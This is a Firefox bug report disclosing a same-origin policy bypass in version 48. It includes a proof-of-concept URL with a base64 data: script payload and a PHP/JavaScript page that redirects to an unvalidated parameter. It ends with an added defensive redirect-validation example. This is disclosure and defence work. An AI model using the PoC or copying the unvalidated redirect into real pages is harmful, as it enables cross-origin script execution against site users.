Closed Bug 1292485 Opened 8 years ago Closed 8 years ago

Firefox V48.0 Same Origin Policy Bypass

Categories

(Firefox :: Untriaged, defect)

48 Branch
defect
Not set
normal

Tracking

RESOLVED DUPLICATE of bug 255107

People

(Reporter: 1009465756, Unassigned)

Details

Attachments

(1 file)

Attached image PoC.png
User Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/52.0.2743.82 Safari/537.36

Steps to reproduce:

Version:
Mozilla/5.0 (Windows NT 6.1; WOW64; rv:48.0) Gecko/20100101 Firefox/48.0

PoC:
http://2.srcms.applinzi.com/uxss.php?ff=data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg==

uxss.php:

<script>
    // Read one parameter by name from the current URL (query string or fragment).
    function getParameter(name){
        var r = new RegExp("(\\?|#|&)" + name + "=([^&#]*)(&|#|$)"), m = location.href.match(r);
        return (!m ? "" : m[2]);
    }

    if(typeof(pgvMain) == "function") {
        pgvMain();
    }

    // The caller-supplied "ff" value is navigated to without any validation;
    // the PoC passes a data: URL here.
    var durl = getParameter("ff");
    setTimeout(function(){
        window.location.replace(durl);
    }, 2);
</script>


Actual results:

When the browser executes the 'window.location.replace(durl);' command, the data:text/html;base64,YWFhYTxzY3JpcHQ+YWxlcnQoZG9jdW1lbnQuZG9tYWluKTwvc2NyaXB0Pg== page should belong to the data URL origin, but in this case the 'data:text/html' page could read the 'http://2.srcms.applinzi.com' origin's 'location.href'. So this is a typical Same Origin Policy Bypass problem.


Expected results:

A data URL should never be able to read the content of the referring page.
Summary: Firefox V48.0 Same Origin Police Bypass → Firefox V48.0 Same Origin Policy Bypass
Group: firefox-core-security → core-security
Flags: sec-bounty?
This is actually how navigating to a data: URL is spec'd in HTML5, though most browsers don't do this. We're considering changing the behavior.
Group: core-security
Status: UNCONFIRMED → RESOLVED
Closed: 8 years ago
Resolution: --- → DUPLICATE
Flags: sec-bounty? → sec-bounty-
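As an added, defender-side example (not code from the bug report or from Mozilla): a hardened replacement for the redirect logic in uxss.php. It assumes an allowlist of redirect hosts (the bug's own host plus a constructed www.example.com) and uses the standard URL / URLSearchParams API available in browsers and Node; only http(s) targets whose host is on that list are navigated to, so a data: or javascript: value for ff is refused regardless of how the browser assigns origins to data: URLs.

```javascript
// Added example, not from the bug report. uxss.php hands a caller-supplied
// "ff" parameter straight to window.location.replace(). In Firefox 48 a data:
// URL reached that way inherited the navigating page's origin, so script in
// the data: document ran as http://2.srcms.applinzi.com. Independently of the
// browser's origin rules, the page should only redirect to known http(s) hosts.

// Assumed allowlist (the bug's host plus a constructed example host).
const ALLOWED_HOSTS = new Set(['2.srcms.applinzi.com', 'www.example.com']);

// Read one parameter by name from a full URL, checking the query string first
// and then the fragment, mirroring what the PoC's RegExp accepted.
function getParameter(href, name) {
  const url = new URL(href);
  const fromQuery = url.searchParams.get(name);
  if (fromQuery !== null) return fromQuery;
  const fromHash = new URLSearchParams(url.hash.replace(/^#/, '')).get(name);
  return fromHash === null ? '' : fromHash;
}

// Return the validated absolute target, or null if the value must not be used.
function safeRedirectTarget(raw, baseHref) {
  if (!raw) return null;               // empty/missing parameter: nothing to do
  let target;
  try {
    target = new URL(raw, baseHref);   // relative paths resolve against the page
  } catch (e) {
    return null;                       // unparseable value: refuse
  }
  // Reject every non-http(s) scheme: data:, javascript:, blob:, file:, ...
  if (target.protocol !== 'http:' && target.protocol !== 'https:') return null;
  // Reject off-site hosts (also catches "//evil.example/" style values).
  if (!ALLOWED_HOSTS.has(target.hostname)) return null;
  return target.href;
}

// Same flow as the PoC page: read "ff", validate it, then navigate.
// Returns the destination used, or null when the redirect was refused.
function redirectFrom(href) {
  const dest = safeRedirectTarget(getParameter(href, 'ff'), href);
  if (dest === null) return null;      // a real page would show an error here
  if (typeof window !== 'undefined') window.location.replace(dest);
  return dest;
}
```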